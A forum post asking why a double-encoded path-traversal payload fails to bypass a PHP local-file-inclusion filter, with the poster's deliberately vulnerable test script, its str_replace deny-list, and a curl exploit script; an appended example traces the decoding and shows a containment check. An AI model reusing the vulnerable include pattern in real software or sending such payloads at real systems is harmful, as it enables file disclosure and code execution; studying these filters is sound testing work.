

Bypass LFI filter with double Encoding



07-19-2017, 07:10 AM #1
MadSec
I'm trying to bypass an LFI filter using double encoding:
https://www.owasp.org/index.php/Double_Encoding

I made three files to see whether it would work, but it doesn't; it will remove everything except the file name.

../include.php: the file I want to include

PHP Code:
<?php
echo"hi";
?>

test.php: the LFI filter that I'm trying to bypass

PHP Code:
<?php
error_reporting(E_ALL);
ini_set('display_errors', 'On');
$_GET['sFile'] = str_replace("../","",strtolower($_GET['sFile']));
$_GET['sFile'] = str_replace("./","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2e%2f","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2f","",$_GET['sFile']);
include($_GET['sFile']);
?>

exploit.php: the script that sends the payload

PHP Code:
<?php
$ch = curl_init();
/* double encoding of "../" => "%252E%252E%252F" */
curl_setopt($ch, CURLOPT_URL, "http://url/lfitest/tst/test.php?sFile=%252E%252E%252Finclude.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sOutput = curl_exec($ch);
curl_close($ch);
echo $sOutput;
?>

Any help would be greatly appreciated.
Thanks in advance!
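
The following is an added example, not part of the original post. It traces the post's payload through the test.php filter (PHP URL-decodes query parameters once when filling $_GET, which is why only the file name is left) and sets the deny-list beside a containment check that canonicalises the path first. The names `post_filter` and `resolve_include` and the temporary directory layout are hypothetical.

```php
<?php
// Added example: function names and the temp directory layout are hypothetical.

// The filter from the post's test.php, wrapped in a function so it can be traced.
function post_filter(string $s): string {
    $s = str_replace("../", "", strtolower($s));
    $s = str_replace("./", "", $s);
    $s = str_replace("%2e%2e%2f", "", $s);
    return str_replace("%2e%2f", "", $s);
}

// Hardened form: canonicalise first, then require the result to sit inside $baseDir.
function resolve_include(string $baseDir, string $name): ?string {
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null; // base missing, or target does not exist as a regular file
    }
    // Containment: the resolved path must start with "<base>/".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed layout: <tmp>/include.php (outside) and <tmp>/tst/page.php (inside).
$root = sys_get_temp_dir() . '/lfitest_' . uniqid();
mkdir($root . '/tst', 0700, true);
file_put_contents($root . '/include.php', '<?php echo "hi";');
file_put_contents($root . '/tst/page.php', '<?php echo "page";');

// The query value as sent by the post's exploit.php, then as PHP exposes it in $_GET.
$wire = '%252E%252E%252Finclude.php';
$get  = urldecode($wire); // one decoding pass: "%2E%2E%2Finclude.php"
echo "value in \$_GET     : $get\n";
echo "after post filter  : ", post_filter($get), "\n"; // "include.php"

// Only the file inside the base directory resolves; the other two are rejected.
foreach (['page.php', '../include.php', $get] as $name) {
    $resolved = resolve_include($root . '/tst', $name);
    printf("%-24s => %s\n", $name, $resolved === null ? 'rejected' : 'allowed');
}
```

A fixed map from request values to file names avoids building a path from user input at all.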
